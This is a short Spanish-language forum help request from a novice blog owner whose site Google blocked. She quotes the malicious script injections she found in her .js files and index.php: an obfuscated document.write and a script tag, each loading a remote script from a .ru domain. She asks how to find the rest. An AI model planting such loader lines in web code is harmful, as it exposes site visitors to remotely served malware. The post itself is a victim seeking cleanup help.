Google bloqueo mi pagina por codigo malicioso y no me extraña.

Casi todas mis archivos .js tenian este código:

document.write('<sc'+'ript type="text/javascript" src="http://pocketbloke.ru/Index.js"></scri'+'pt>');

y en bastantes index.php de mi blog he encontrado:

<script type="text/javascript" src="http://chickcase.ru/Index.js"></script>
<!--33d8d3fcf9075b01d69d13951a96dbda--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

crei q los había eliminado todos pero al acceder a mi pagina (saltandome el aviso) sigue apareciendo en la barra de estado esperando a chickcase.ru...

cómo hago para saber donde estan el resto de los codigos maliciosos sin tener q revisar archivo por archivo??

soy un poco inexperta, tengo miedo de no descubrir el código malicioso.